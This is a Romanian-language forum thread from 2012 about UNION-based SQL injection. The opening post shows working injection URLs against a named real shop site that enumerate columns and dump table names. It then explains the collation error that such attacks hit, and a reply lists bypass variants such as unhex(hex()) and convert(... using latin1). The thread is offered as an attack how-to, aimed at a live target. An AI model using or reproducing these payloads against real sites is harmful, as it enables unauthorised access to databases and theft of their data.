Sheyken Posted August 19, 2012 Report Share Posted August 19, 2012 (edited) Multi dintre noi am intalnit aceasta problema. As dori sa va explic pe scurt de ce apare aceasta erroare si de ce trebuie sa ne folosim de:[COLOR="#00FF00"]unhex(hex([/COLOR]atunci cand apare aceasta erroare:[COLOR="#00FF00"]Illegal mix of collations for operation 'UNION'[/COLOR]M-am gandit ca ar fi interesanta explicatia la aceasta intreba.(Pe scurt) Definitia "collate-ului": Collate-ul este modul in care a fost scrisa o coloana din baza de date cu un anumit tip de encoding exemplu: LATIN11. Vom incepe de la 0, luam un site, exemplu:http://www.baronfishing.ro/produse.php?id=127 union all select 1,2,3,4--coloana vulnerabila (disponibila) este 2.2. Voi sari direct la erroarea "Illegal mix of collations.":http://www.baronfishing.ro/produse.php?id=127 UNION SELECT 1,group_concat(table_name,0x3a),3,4 from information_schema.tables where table_schema=database()--select * from `cats` where `pid` = 127 UNION SELECT 1,group_concat(table_name,0x3a),3,4 from information_schema.tables where table_schema=database()--1271 - [COLOR="#00FF00"]Illegal mix of collations for operation 'UNION'[/COLOR]Ok, acum va intrebari: Ce p*m e cu erroarea asta? Explicatia: Prin "union all select 1,group_concat(table_name,0x3a),3,4 from information_schema.tables where table_schema=database()--" se selecteaza datele prin formatul encodat default [ UTF8 ]. In baza de date encoding-ul a fost scris in LATIN1 iar noi cand folosim "union all select bla bla..." se selecteaza in default [ UTF8 ] prin aceasta selectare "collationul" coloanei principal selectate cu cea de la union nu coincide, primul encoding cu al 2 lea.Multumiri speciale lui totti93 pentru link. Edited August 19, 2012 by Sheyken Quote Link to comment Share on other sites More sharing options...
denjacker Posted August 19, 2012 Report Share Posted August 19, 2012 alternative :unhex(hex(version()))cast(version()+as+binary)convert(version(),binary)convert(version()+using+binary) convert(version()+using+latin1)convert(@@version using cp1251)aes_decrypt(aes_encrypt(version(),1),1)uncompress(compress(version()))unhex(hex(cast(version()+as+char)))... Quote Link to comment Share on other sites More sharing options...
Sheyken Posted August 19, 2012 Author Report Share Posted August 19, 2012 O mica chestie, cand omu' te cauta tu nu raspunzi, cand nu te cauta raspunzi. Ce-i cu tine ma? Quote Link to comment Share on other sites More sharing options...
DarkLegion Posted August 20, 2012 Report Share Posted August 20, 2012 Frumos, bravo Quote Link to comment Share on other sites More sharing options...
Genius++ Posted August 20, 2012 Report Share Posted August 20, 2012 asta e un fel de sqli Quote Link to comment Share on other sites More sharing options...
popbogdan8 Posted August 20, 2012 Report Share Posted August 20, 2012 bravo,frumos Quote Link to comment Share on other sites More sharing options...
